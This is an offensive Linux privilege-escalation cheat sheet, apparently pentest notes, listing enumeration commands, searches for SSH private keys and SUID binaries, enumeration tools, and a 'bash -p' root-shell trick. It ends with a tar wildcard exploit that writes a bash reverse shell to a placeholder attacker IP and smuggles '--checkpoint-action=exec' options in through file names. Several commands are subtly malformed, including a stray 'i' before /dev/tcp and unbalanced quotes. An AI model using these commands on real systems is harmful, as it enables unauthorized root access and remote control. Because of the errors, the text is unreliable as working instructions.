Privesc Checklist

sudo -l
Display commands allowed to run with root privileges.

history
Show shell history.

env
Show environment variables.

find / -perm -u=s -type f 2> /dev/null
Search for commands with SUID enabled (then check https://gtfobins.github.io/)

getcap -r / 2>/dev/null
Search for commands with capabilities (then check https://gtfobins.github.io/)

find / -writable 2>/dev/null
Search for writable folders.

find / -name id_rsa 2> /dev/null/
Search for SSH private keys.

cat /etc/crontab
Looking for automated scripts.

Others Suggestions

Determining the kernel of the machine and search for kernel exploitation (such as Dirtyc0w).
Misconfigured file and directory permissions.
pspy (process snooping): https://github.com/DominicBreuker/pspy
https://redteamrecipe.com/40-Method-For-Privilege-Escalation/

Automated Scripts

LINPEAS

https://github.com/carlospolop/PEASS-ng/releases

./linpeas.sh

LINEUM

https://github.com/rebootuser/LinEnum

./LinEnum.sh

METASPLOIT

use post/multi/recon/local_exploit_suggester
Check exploits for privilege escalation.

SUID Examples

CP

cp /root/ /home/myUser/
cd /home/myUser/root
Access root content.

BASH

bash -p
Get a root shell.

Wildcard Exploitation

Resource

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/

Example

Script running as root:

tar cf /home/myUser/backups/backup.tgz *

Exploit:

echo "bash -i >& i/dev/tcp/[ATTACKER IP]/[ATTACKER PORT] 0>&1" > revshell.sh
touch "/home/myUser/backups/--checkpoint-action=exec=sh revshell.sh"
touch "/home/myUser/"--checkpoint=1"

Privesc Checklist#

Others Suggestions#

Automated Scripts#

LINPEAS#

LINEUM#

METASPLOIT#

SUID Examples#

CP#

BASH#

Wildcard Exploitation#

Resource#

Example#

Privesc Checklist

Others Suggestions

Automated Scripts

LINPEAS

LINEUM

METASPLOIT

SUID Examples

CP

BASH

Wildcard Exploitation

Resource

Example